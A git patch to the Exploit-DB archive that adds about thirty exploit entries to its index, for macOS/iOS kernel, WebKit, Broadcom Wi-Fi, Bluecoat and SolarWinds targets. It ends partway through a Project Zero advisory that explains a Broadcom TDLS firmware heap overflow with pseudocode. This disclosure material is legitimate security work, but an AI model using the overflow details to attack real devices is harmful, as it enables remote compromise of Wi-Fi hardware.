From 6624e39c26ef2d48421cba164e25ffa6ee0b90dc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 5 Apr 2017 05:01:18 +0000 Subject: [PATCH] DB: 2017-04-05 31 new exploits macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking Broadcom Wi-Fi SoC - Heap Overflow in _wlc_tdls_cal_mic_chk_ Due to Large RSN IE in TDLS Setup Confirm Frame Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free Apple WebKit - 'RenderLayer' Use-After-Free Apple WebKit - Negative-Size memmove in HTMLFormElement Apple WebKit - 'FormSubmission::create' Use-After-Free Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free Apple WebKit - 'table' Use-After-Free Apple WebKit - 'WebCore::toJS' Use-After-Free macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device Bluecoat ASG 6.6/CAS 1.3 - Privilege Escalation (Metasploit) Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection (Metasploit) Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow Exploit SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit) Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit) Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow Pixie 1.0.4 - Arbitrary File Upload Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting Maian Uploader 4.0 - 'index.php' keywords Parameter Cross-Site Scripting Maian Uploader 4.0 - admin/index.php keywords Parameter Cross-Site Scripting Maian Uploader 4.0 - admin/inc/header.php Multiple Parameter Cross-Site Scripting Maian Uploader 4.0 - 'keywords' Parameter Cross-Site Scripting Maian Uploader 4.0 - 'index.php' Cross-Site Scripting Maian Uploader 4.0 - 'header.php' Cross-Site Scripting Maian Uploader 4.0 - 'user' Parameter SQL Injection Maian Survey 1.1 - 'survey' Parameter SQL Injection Maian Greetings 2.1 - 'cat' Parameter SQL Injection --- files.csv | 39 ++++- platforms/hardware/dos/41806.txt | 75 +++++++++ platforms/hardware/remote/41805.txt | 133 +++++++++++++++ platforms/hardware/remote/41808.txt | 60 +++++++ platforms/linux/local/41786.rb | 126 +++++++++++++++ platforms/linux/remote/41785.rb | 197 +++++++++++++++++++++++ platforms/linux/remote/41795.rb | 164 +++++++++++++++++++ platforms/macos/dos/41790.c | 102 ++++++++++++ platforms/macos/dos/41791.c | 70 ++++++++ platforms/macos/dos/41797.c | 212 ++++++++++++++++++++++++ platforms/macos/dos/41798.c | 138 ++++++++++++++++ platforms/multiple/dos/41792.c | 113 +++++++++++++ platforms/multiple/dos/41793.c | 185 +++++++++++++++++++++ platforms/multiple/dos/41794.c | 146 +++++++++++++++++ platforms/multiple/dos/41796.c | 166 +++++++++++++++++++ platforms/multiple/dos/41807.html | 222 ++++++++++++++++++++++++++ platforms/multiple/dos/41809.html | 175 ++++++++++++++++++++ platforms/multiple/dos/41810.html | 137 ++++++++++++++++ platforms/multiple/dos/41811.html | 195 ++++++++++++++++++++++ platforms/multiple/dos/41812.html | 170 ++++++++++++++++++++ platforms/multiple/dos/41813.html | 192 ++++++++++++++++++++++ platforms/multiple/dos/41814.html | 195 ++++++++++++++++++++++ platforms/multiple/local/41804.c | 220 +++++++++++++++++++++++++ platforms/multiple/webapps/41799.html | 48 ++++++ platforms/multiple/webapps/41800.html | 70 ++++++++ platforms/multiple/webapps/41801.html | 51 ++++++ platforms/multiple/webapps/41802.html | 86 ++++++++++ platforms/multiple/webapps/41803.html | 34 ++++ platforms/php/webapps/41784.txt | 108 +++++++++++++ platforms/php/webapps/41787.txt | 26 +++ platforms/php/webapps/41788.txt | 18 +++ platforms/php/webapps/41789.txt | 18 +++ 32 files changed, 3887 insertions(+), 4 deletions(-) create mode 100755 platforms/hardware/dos/41806.txt create mode 100755 platforms/hardware/remote/41805.txt create mode 100755 platforms/hardware/remote/41808.txt create mode 100755 platforms/linux/local/41786.rb create mode 100755 platforms/linux/remote/41785.rb create mode 100755 platforms/linux/remote/41795.rb create mode 100755 platforms/macos/dos/41790.c create mode 100755 platforms/macos/dos/41791.c create mode 100755 platforms/macos/dos/41797.c create mode 100755 platforms/macos/dos/41798.c create mode 100755 platforms/multiple/dos/41792.c create mode 100755 platforms/multiple/dos/41793.c create mode 100755 platforms/multiple/dos/41794.c create mode 100755 platforms/multiple/dos/41796.c create mode 100755 platforms/multiple/dos/41807.html create mode 100755 platforms/multiple/dos/41809.html create mode 100755 platforms/multiple/dos/41810.html create mode 100755 platforms/multiple/dos/41811.html create mode 100755 platforms/multiple/dos/41812.html create mode 100755 platforms/multiple/dos/41813.html create mode 100755 platforms/multiple/dos/41814.html create mode 100755 platforms/multiple/local/41804.c create mode 100755 platforms/multiple/webapps/41799.html create mode 100755 platforms/multiple/webapps/41800.html create mode 100755 platforms/multiple/webapps/41801.html create mode 100755 platforms/multiple/webapps/41802.html create mode 100755 platforms/multiple/webapps/41803.html create mode 100755 platforms/php/webapps/41784.txt create mode 100755 platforms/php/webapps/41787.txt create mode 100755 platforms/php/webapps/41788.txt create mode 100755 platforms/php/webapps/41789.txt diff --git a/files.csv b/files.csv index 0143d75a5..a7b985b1a 100644 --- a/files.csv +++ b/files.csv @@ -203,6 +203,7 @@ id,file,description,date,author,platform,type,port 1129,platforms/windows/dos/1129.c,"Quick 'n EasY 3.0 FTP Server - Remote Denial of Service",2005-08-02,Kozan,windows,dos,0 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service",2005-08-05,basher13,windows,dos,0 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0 +41796,platforms/multiple/dos/41796.c,"macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow",2017-04-04,"Google Security Research",multiple,dos,0 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone - Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos,0 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0 1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0 @@ -1909,7 +1910,9 @@ id,file,description,date,author,platform,type,port 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0 16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit)",2010-08-30,Metasploit,windows,dos,0 +41793,platforms/multiple/dos/41793.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption",2017-04-04,"Google Security Research",multiple,dos,0 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow (Metasploit)",2010-09-25,Metasploit,aix,dos,0 +41798,platforms/macos/dos/41798.c,"macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability",2017-04-04,"Google Security Research",macos,dos,0 16790,platforms/windows/dos/16790.rb,"PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080 16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,aix,dos,0 16939,platforms/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",multiple,dos,0 @@ -5430,8 +5433,13 @@ id,file,description,date,author,platform,type,port 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 +41791,platforms/macos/dos/41791.c,"macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn",2017-04-04,"Google Security Research",macos,dos,0 +41792,platforms/multiple/dos/41792.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos,0 +41797,platforms/macos/dos/41797.c,"macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos,0 +41794,platforms/multiple/dos/41794.c,"macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0 41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0 +41790,platforms/macos/dos/41790.c,"macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0 41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0 41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0 @@ -5444,6 +5452,14 @@ id,file,description,date,author,platform,type,port 41767,platforms/linux/dos/41767.txt,"Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure",2014-01-14,halfdog,linux,dos,0 41768,platforms/linux/dos/41768.txt,"Apache 2.2 - Scoreboard Invalid Free On Shutdown",2012-01-11,halfdog,linux,dos,0 41769,platforms/linux/dos/41769.txt,"Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow",2011-11-02,halfdog,linux,dos,0 +41806,platforms/hardware/dos/41806.txt,"Broadcom Wi-Fi SoC - Heap Overflow in _wlc_tdls_cal_mic_chk_ Due to Large RSN IE in TDLS Setup Confirm Frame",2017-04-04,"Google Security Research",hardware,dos,0 +41807,platforms/multiple/dos/41807.html,"Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 +41809,platforms/multiple/dos/41809.html,"Apple WebKit - 'RenderLayer' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 +41810,platforms/multiple/dos/41810.html,"Apple WebKit - Negative-Size memmove in HTMLFormElement",2017-04-04,"Google Security Research",multiple,dos,0 +41811,platforms/multiple/dos/41811.html,"Apple WebKit - 'FormSubmission::create' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 +41812,platforms/multiple/dos/41812.html,"Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 +41813,platforms/multiple/dos/41813.html,"Apple WebKit - 'table' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 +41814,platforms/multiple/dos/41814.html,"Apple WebKit - 'WebCore::toJS' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -6789,6 +6805,7 @@ id,file,description,date,author,platform,type,port 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0 +41804,platforms/multiple/local/41804.c,"macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device",2017-04-04,"Google Security Research",multiple,local,0 40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0 16503,platforms/windows/local/16503.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0 16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0 @@ -6798,6 +6815,7 @@ id,file,description,date,author,platform,type,port 16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0 16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution (Metasploit)",2011-01-08,Metasploit,windows,local,0 16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)",2010-06-15,Metasploit,windows,local,0 +41786,platforms/linux/local/41786.rb,"Bluecoat ASG 6.6/CAS 1.3 - Privilege Escalation (Metasploit)",2017-04-03,"Chris Hebert",linux,local,0 16606,platforms/windows/local/16606.rb,"Adobe - 'Collab.getIcon()' Buffer Overflow (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0 16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1)",2010-09-20,Metasploit,windows,local,0 16615,platforms/windows/local/16615.rb,"Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)",2010-04-30,Metasploit,windows,local,0 @@ -10625,6 +10643,7 @@ id,file,description,date,author,platform,type,port 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0 16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0 16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0 +41785,platforms/linux/remote/41785.rb,"Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection (Metasploit)",2017-04-03,"Chris Hebert",linux,remote,0 16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,linux,remote,0 16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 16292,platforms/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,multiple,remote,0 @@ -14396,6 +14415,7 @@ id,file,description,date,author,platform,type,port 33379,platforms/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,multiple,remote,0 33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 - '.fig' Buffer Overflow",2009-12-03,pedamachephepto,linux,remote,0 33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i - Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0 +41805,platforms/hardware/remote/41805.txt,"Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow Exploit",2017-04-04,"Google Security Research",hardware,remote,0 33453,platforms/windows/remote/33453.py,"Easy File Management Web Server 5.3 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0 33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0 33471,platforms/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,hardware,remote,0 @@ -15393,14 +15413,16 @@ id,file,description,date,author,platform,type,port 41690,platforms/multiple/remote/41690.rb,"Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-03-06,Metasploit,multiple,remote,0 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0 +41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0 41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80 -41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0 +41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0 41738,platforms/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0 41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0 41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443 41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0 41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0 +41808,platforms/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -24738,7 +24760,13 @@ id,file,description,date,author,platform,type,port 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,php,webapps,0 16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0 16281,platforms/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0 +41784,platforms/php/webapps/41784.txt,"Pixie 1.0.4 - Arbitrary File Upload",2017-04-02,rungga_reksya,php,webapps,0 16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0 +41801,platforms/multiple/webapps/41801.html,"Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window",2017-04-04,"Google Security Research",multiple,webapps,0 +41802,platforms/multiple/webapps/41802.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0 +41803,platforms/multiple/webapps/41803.html,"Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion",2017-04-04,"Google Security Research",multiple,webapps,0 +41799,platforms/multiple/webapps/41799.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0 +41800,platforms/multiple/webapps/41800.html,"Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,cfm,webapps,0 16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTPd Daemon/Service - Arbitrary Command Execution (Metasploit)",2010-07-07,Metasploit,cgi,webapps,0 16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise - masterCGI Arbitrary Command Execution (Metasploit)",2010-10-05,Metasploit,cgi,webapps,0 @@ -32157,9 +32185,9 @@ id,file,description,date,author,platform,type,port 31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injection",2008-05-05,ZoRLu,php,webapps,0 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 -31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - 'index.php' keywords Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 -31742,platforms/php/webapps/31742.txt,"Maian Uploader 4.0 - admin/index.php keywords Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 -31743,platforms/php/webapps/31743.txt,"Maian Uploader 4.0 - admin/inc/header.php Multiple Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 +31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - 'keywords' Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 +31742,platforms/php/webapps/31742.txt,"Maian Uploader 4.0 - 'index.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 +31743,platforms/php/webapps/31743.txt,"Maian Uploader 4.0 - 'header.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 31744,platforms/php/webapps/31744.txt,"osCommerce 2.1/2.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,"David Sopas Ferreira",php,webapps,0 31745,platforms/php/webapps/31745.txt,"BatmanPorTaL - uyeadmin.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0 31746,platforms/php/webapps/31746.txt,"BatmanPorTaL - profil.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0 @@ -37626,6 +37654,9 @@ id,file,description,date,author,platform,type,port 41674,platforms/php/webapps/41674.txt,"Flippa Clone - SQL Injection",2017-03-23,"Ihsan Sencan",php,webapps,0 41676,platforms/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)",2014-10-15,Metasploit,linux,webapps,0 41677,platforms/linux/webapps/41677.rb,"D-Link/TRENDnet - NCC Service Command Injection (Metasploit)",2015-02-26,Metasploit,linux,webapps,0 +41787,platforms/php/webapps/41787.txt,"Maian Uploader 4.0 - 'user' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0 +41788,platforms/php/webapps/41788.txt,"Maian Survey 1.1 - 'survey' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0 +41789,platforms/php/webapps/41789.txt,"Maian Greetings 2.1 - 'cat' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0 41685,platforms/multiple/webapps/41685.rb,"MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)",2014-11-18,Metasploit,multiple,webapps,0 41686,platforms/multiple/webapps/41686.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit)",2015-01-25,Metasploit,multiple,webapps,0 41687,platforms/multiple/webapps/41687.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit)",2015-01-05,Metasploit,multiple,webapps,0 diff --git a/platforms/hardware/dos/41806.txt b/platforms/hardware/dos/41806.txt new file mode 100755 index 000000000..cefd5930c --- /dev/null +++ b/platforms/hardware/dos/41806.txt @@ -0,0 +1,75 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1047 + +Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. + +One of the events handled by the BCM firmware is the processing of TDLS connections (802.11z). TDLS connections allow clients to exchange data between one another without passing it through the AP (thus preventing congestion at the AP). + +In order to verify the integrity of TDLS messages, each message exchanged between the TDLS peers includes a message integrity code (MIC). The MIC is calculated using AES-CMAC with a key derived during the setup process (TPK-KCK). + +When a TDLS Setup Request frame is sent by either one of the peers in an established TDLS connection, the receiving client must verify the MIC before processing the request. The MIC for TDLS Setup Request and TDLS Setup Confirm frames is calculated as follows: + +AES-CMAC(TPK-KCK, InitiatorMAC || + ResponderMAC || + TransactionSeq || + LinkID-IE || + RSN-IE || + TimeoutInterval-IE || + FastTransition-IE) + +(see "wpa_tdls_ftie_mic" under https://w1.fi/cgit/hostap/plain/src/rsn_supp/tdls.c) + +All TDLS connections are accepted automatically from any peer and are handled solely by the BCM firmware (meaning there is no need for user interaction or involvement in any way - once a TDLS Setup Request is received by the firmware, it will proceed with the TDLS handshake and subsequently create a TDLS connection with the requesting peer). + +When the BCM firmware receives a TDLS Setup request frame, it verifies the MIC and responds with a TDLS Setup Response frame. The initiator then sends a TDLS Setup confirm frame in order to establish the connection. The BCM firmware uses the "wlc_tdls_cal_mic_chk" function to calculate the MIC of the received frames (both for the setup and the confirm). When processing the TDLS Setup Request frame, the RSN IE is verified and parsed in order to proceed with the derivation of the TPK. This verification also makes sure that the length of the RSN IE is valid for the chosen encryption type. However, when a TDLS Setup Confirm (M3) message is received, the firmware fails to verify the RSN IE, before calling the "wlc_tdls_cal_mic_chk" function in order to verify the MIC of the incoming frame. + +The "wlc_tdls_cal_mic_chk" function allocates a buffer of size 256 on the heap, into which the needed information elements are gathered in order to calculate the AES-CMAC. However, the function does not sufficiently verify the length of the RSN IE included in the Setup Confirm frame. This allows an attacker to include an abnormally large RSN IE, causing a heap-overflow in "wlc_tdls_cal_mic_chk". + +Here is the approximate simplified high-level code for the function: + +1. uint8_t* buffer = malloc(256); +2. uint8_t* pos = buffer; +3. +4. //Copying the initial (static) information +5. uint8_t* linkid_ie = bcm_parse_tlvs(..., 101); +6. memcpy(pos, linkid_ie + 0x8, 0x6); pos += 0x6; //Initiator MAC +7. memcpy(pos, linkid_ie + 0xE, 0x6); pos += 0x6; //Responder MAC +8. *pos = transaction_seq; pos++; //TransactionSeq +9. memcpy(pos, linkid_ie, 0x14); pos += 0x14; //LinkID-IE +10. +11. //Copying the RSN IE +12. uint8_t* rsn_ie = bcm_parse_tlvs(..., 48); +13. if (rsn_ie[1] + 2 + (pos - buffer) > 0xFF) { +14. ... //Handle overflow +15. } +16. memcpy(pos, rsn_ie, rsn_ie[1] + 2); pos += rsn_ie[1] + 2; //RSN-IE +17. +18. //Copying the remaining IEs +19. uint8_t* timeout_ie = bcm_parse_tlvs(..., 56); +20. uint8_t* ft_ie = bcm_parse_tlvs(..., 55); +21. memcpy(pos, timeout_ie, 0x7); pos += 0x7; //Timeout Interval IE +22. memcpy(pos, ft_ie, 0x54); pos += 0x54; 